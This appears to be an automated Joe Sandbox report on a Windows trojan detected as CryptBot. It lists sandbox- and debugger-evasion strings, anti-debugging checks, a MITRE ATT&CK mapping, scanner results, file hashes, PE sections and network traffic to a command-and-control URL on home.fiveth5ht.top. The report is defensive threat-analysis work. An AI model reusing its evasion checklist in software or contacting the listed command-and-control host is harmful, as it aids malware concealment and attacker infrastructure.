Source: A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: A3nofpjN9A.exe, 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | File opened: NTICE
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | File opened: SICE
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Process queried: DebugPort (reported 3 times)
Source: A3nofpjN9A.exe, 00000000.00000002.2203627232.0000000000C37000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 'Program Manager
Source: A3nofpjN9A.exe | Binary or memory string: 6}'Program Manager
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation (reported 3 times)
Source: C:\Users\user\Desktop\A3nofpjN9A.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.5:49705 -> 81.29.149.125:80
MITRE ATT&CK matrix (leading numbers are the counts shown in the report's matrix):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 24 Virtualization/Sandbox Evasion | OS Credential Dumping | 741 Security Software Discovery | 1 Exploitation of Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 24 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 Deobfuscate/Decode Files or Information | Security Account Manager | 13 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 3 Obfuscated Files or Information | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 12 Software Packing | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 216 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label
A3nofpjN9A.exe | 61% | ReversingLabs | Win32.Trojan.CryptBot
A3nofpjN9A.exe | 44% | Virustotal | -
A3nofpjN9A.exe | 100% | Avira | TR/Crypt.TPM.Gen
A3nofpjN9A.exe | 100% | Joe Sandbox ML | -
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862E | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument= | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862u | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 81.29.149.125 | true | false | - | high
httpbin.org | 3.218.7.103 | true | false | - | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | - | high
https://httpbin.org/ip | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://home.fiveth5ht.top/OyKvQ | A3nofpjN9A.exe, 00000000.00000002.2204472447.00000000017DF000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF17 | A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://html4/loose.dtd | A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://httpbin.org/ipbefore | A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862E | A3nofpjN9A.exe, 00000000.00000003.2170407764.0000000001787000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170387270.0000000001782000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html | A3nofpjN9A.exe, A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://curl.se/docs/hsts.html# | A3nofpjN9A.exe | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862u | A3nofpjN9A.exe, 00000000.00000003.2170407764.0000000001787000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204245896.0000000001789000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170387270.0000000001782000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/alt-svc.html | A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://.css | A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument= | A3nofpjN9A.exe, A3nofpjN9A.exe, 00000000.00000003.2169724733.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169437946.00000000017F4000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000002.2204540533.0000000001800000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2169602744.00000000017F6000.00000004.00000020.00020000.00000000.sdmp, A3nofpjN9A.exe, 00000000.00000003.2170003230.00000000017FF000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://.jpg | A3nofpjN9A.exe, 00000000.00000002.2203142510.0000000000941000.00000040.00000001.01000000.00000003.sdmp, A3nofpjN9A.exe, 00000000.00000003.2068974561.00000000072C0000.00000004.00001000.00020000.00000000.sdmp | false | - | high
IP | Domain | Country | ASN | ASN Name | Malicious
81.29.149.125 | home.fiveth5ht.top | Switzerland | 39616 | COMUNICA_IT_SERVICESCH | false
3.218.7.103 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581601
Start date and time: 2024-12-28 09:46:09 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 16s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: A3nofpjN9A.exe (renamed because original name is a hash value)
Original Sample Name: 2115e3fbda695f11af734c24ee699e6d.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@6/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
03:47:10 | API Interceptor | 3x Sleep call for process: A3nofpjN9A.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
81.29.149.125 | QMtCX5RLOP.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | s8kPMNXOZY.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | GjZewfxHTi.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | sYPORwmgwQ.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
81.29.149.125 | xdeRtWCeNH.exe | malicious | Unknown | home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862
3.218.7.103 | j2nLC29vCy.exe | malicious | LummaC |
3.218.7.103 | vUcZzNWkKc.exe | malicious | LummaC |
3.218.7.103 | GjZewfxHTi.exe | malicious | Unknown |
3.218.7.103 | xdeRtWCeNH.exe | malicious | Unknown |
3.218.7.103 | E205fJJS1Q.exe | malicious | LummaC |
3.218.7.103 | w22319us3M.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT |
3.218.7.103 | QzK1LCSuq2.exe | malicious | LummaC |
3.218.7.103 | OoYYtngD7d.exe | malicious | Unknown |
3.218.7.103 | NWJ4JvzFcs.exe | malicious | Unknown |
3.218.7.103 | EwhnoHx0n5.exe | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
httpbin.org | QMtCX5RLOP.exe | malicious | Unknown | 34.226.108.155
httpbin.org | j2nLC29vCy.exe | malicious | LummaC | 3.218.7.103
httpbin.org | es5qBEFupj.exe | malicious | LummaC | 34.226.108.155
httpbin.org | s8kPMNXOZY.exe | malicious | Unknown | 34.226.108.155
httpbin.org | vUcZzNWkKc.exe | malicious | LummaC | 3.218.7.103
httpbin.org | GjZewfxHTi.exe | malicious | Unknown | 3.218.7.103
httpbin.org | sYPORwmgwQ.exe | malicious | Unknown | 34.226.108.155
httpbin.org | CLaYpUL3zw.exe | malicious | LummaC | 34.226.108.155
httpbin.org | xdeRtWCeNH.exe | malicious | Unknown | 3.218.7.103
httpbin.org | f7qbEfJl0B.exe | malicious | Unknown | 34.226.108.155
home.fiveth5ht.top | QMtCX5RLOP.exe | malicious | Unknown | 81.29.149.125
home.fiveth5ht.top | s8kPMNXOZY.exe | malicious | Unknown | 81.29.149.125
home.fiveth5ht.top | GjZewfxHTi.exe | malicious | Unknown | 81.29.149.125
home.fiveth5ht.top | sYPORwmgwQ.exe | malicious | Unknown | 81.29.149.125
home.fiveth5ht.top | xdeRtWCeNH.exe | malicious | Unknown | 81.29.149.125
home.fiveth5ht.top | f7qbEfJl0B.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | 5KwhHEdmM4.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | dZsdMl5Pwl.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | BkB1ur7aFW.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | OoYYtngD7d.exe | malicious | Unknown | 5.101.3.217
Match | Associated Sample Name / URL | Detection | Threat Name | Context
COMUNICA_IT_SERVICESCH | QMtCX5RLOP.exe | malicious | Unknown | 81.29.149.125
COMUNICA_IT_SERVICESCH | s8kPMNXOZY.exe | malicious | Unknown | 81.29.149.125
COMUNICA_IT_SERVICESCH | GjZewfxHTi.exe | malicious | Unknown | 81.29.149.125
COMUNICA_IT_SERVICESCH | sYPORwmgwQ.exe | malicious | Unknown | 81.29.149.125
COMUNICA_IT_SERVICESCH | xdeRtWCeNH.exe | malicious | Unknown | 81.29.149.125
COMUNICA_IT_SERVICESCH | file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS | 81.29.149.45
COMUNICA_IT_SERVICESCH | hmips.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | ppc.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | mips.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | x86.elf | malicious | Unknown | 81.29.149.178
AMAZON-AESUS | QMtCX5RLOP.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | j2nLC29vCy.exe | malicious | LummaC | 3.218.7.103
AMAZON-AESUS | es5qBEFupj.exe | malicious | LummaC | 34.226.108.155
AMAZON-AESUS | s8kPMNXOZY.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | vUcZzNWkKc.exe | malicious | LummaC | 3.218.7.103
AMAZON-AESUS | GjZewfxHTi.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | sYPORwmgwQ.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | CLaYpUL3zw.exe | malicious | LummaC | 34.226.108.155
AMAZON-AESUS | xdeRtWCeNH.exe | malicious | Unknown | 3.218.7.103
AMAZON-AESUS | https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en | malicious | Unknown | 54.225.146.64
                                                    No created / dropped files found
                                                    File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                    Entropy (8bit):7.984161071034882
                                                    TrID:
                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                    • DOS Executable Generic (2002/1) 0.02%
                                                    • VXD Driver (31/22) 0.00%
                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                    File name:A3nofpjN9A.exe
                                                    File size:4'482'048 bytes
                                                    MD5:2115e3fbda695f11af734c24ee699e6d
                                                    SHA1:334ace427d9b4e6a95ea977e31c8060c3e3eb54c
                                                    SHA256:a782e6fb792b210e82802ac312542a670a37f4668031418875db91a4c9dfd5be
                                                    SHA512:7f198dce8e11febbd0240783fcb167852bf61c363c86f9493f7fe229fb600130b7a1697ef168d26f767319d081b4798c8584c3e08ee476483e330e74c9bf6738
                                                    SSDEEP:98304:l6K88R3RbvX59VfoLNuqfCxpK4N7URJT6S9Rjf/J8Zvx:lV88fX53foLnqvsN6S/jfKZv
                                                    TLSH:732633969A0F669FC24D4F7E0985E2ED9017B51FD8C63B4A28D42E20177C6FEB2D4087
                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................D...@... ............................
                                                    Icon Hash:00928e8e8686b000
                                                    Entrypoint:0x102e000
                                                    Entrypoint Section:.taggant
                                                    Digitally signed:true
                                                    Imagebase:0x400000
                                                    Subsystem:windows gui
                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                                                    DLL Characteristics:DYNAMIC_BASE
                                                    Time Stamp:0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
                                                    TLS Callbacks:
                                                    CLR (.Net) Version:
                                                    OS Version Major:4
                                                    OS Version Minor:0
                                                    File Version Major:4
                                                    File Version Minor:0
                                                    Subsystem Version Major:4
                                                    Subsystem Version Minor:0
                                                    Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                    Signature Valid:
                                                    Signature Issuer:
                                                    Signature Validation Error:
                                                    Error Number:
                                                        Instruction
                                                        jmp 00007F5FC096F03Ah
                                                        cmovb eax, dword ptr [eax+eax+00h]
                                                        add byte ptr [eax], al
                                                        add cl, ch
                                                        add byte ptr [eax], ah
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc2cb40 | 0x10 | jqefefdt
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc2caf0 | 0x18 | jqefefdt
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x6db000 | 0x288a00 | 90866d48ad5a6acfda7a178351d9f452 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6dc000 | 0x1ac | 0x200 | 03bd0fb364e7fd99bf64365f4a41b430 | False | 0.583984375 | data | 4.594545029539049 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x6de000 | 0x395000 | 0x200 | 1d81612b6cbdb994e9c20584518336e9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
jqefefdt | 0xa73000 | 0x1ba000 | 0x1b9e00 | d81169eb09bc45e6891c3124aac8058b | False | 0.9944594236209335 | data | 7.955450902362483 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rpjpprvb | 0xc2d000 | 0x1000 | 0x400 | f3986ec00586215e537716b1dfae1d82 | False | 0.7705078125 | data | 6.039967443833545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc2e000 | 0x3000 | 0x2200 | 0a08e087f740ea354d79021606b09e27 | False | 0.006433823529411764 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc2cb50 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
                                                        Dec 28, 2024 09:47:11.036704063 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.036742926 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.036802053 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.036809921 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.036937952 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.036947012 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037000895 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037086010 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037147999 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037302971 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037343979 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037431955 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037507057 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037715912 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037764072 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.037826061 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037877083 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.037890911 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.037944078 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.037967920 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.038012981 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.038019896 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.038062096 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.038090944 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.038145065 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.114398003 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.114533901 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.155988932 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156028032 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156075954 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156125069 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.156177044 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.156202078 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156296968 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156361103 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156493902 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156529903 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156662941 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156738043 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156852007 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.156991959 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157027960 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157150030 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157160044 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157205105 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157275915 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157327890 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157387018 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157485008 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157494068 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157547951 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157557964 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157651901 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157661915 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157696962 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157742977 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157804012 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157856941 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157892942 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157917023 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.157993078 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.157994986 CET4970580192.168.2.581.29.149.125
                                                        Dec 28, 2024 09:47:11.158004999 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158019066 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158085108 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158093929 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158138037 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158169985 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158267975 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158277988 CET804970581.29.149.125192.168.2.5
                                                        Dec 28, 2024 09:47:11.158410072 CET804970581.29.149.125192.168.2.5
